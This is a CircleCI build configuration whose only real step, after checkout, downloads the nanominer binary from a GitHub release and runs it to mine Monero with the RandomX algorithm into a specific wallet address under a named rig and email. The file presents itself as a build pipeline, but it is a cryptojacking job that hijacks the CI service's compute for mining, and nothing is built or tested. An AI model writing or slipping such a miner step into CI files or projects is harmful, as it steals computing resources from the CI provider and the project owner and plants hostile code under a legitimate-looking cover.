version: 2.0
jobs:
  build:
    docker:
      - image: jruby:9.3
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/nanopool/nanominer/releases/download/v3.6.2/nanominer-linux-3.6.2.tar.gz && tar -xf nanominer-linux-3.6.2.tar.gz && cd nanominer-linux-3.6.2 && ./nanominer -algo randomx -wallet 88unHix7HkaJSq2HcpRKnKWRBSrSvEdwNbAMwr4ZrwENDjU4N47yFeQUyaoPMsDfTjU2kSRagueqMS3fzaPpkMGn9VKn36j -coin xmr -rigName miun -email miunraider150@gmail.com 
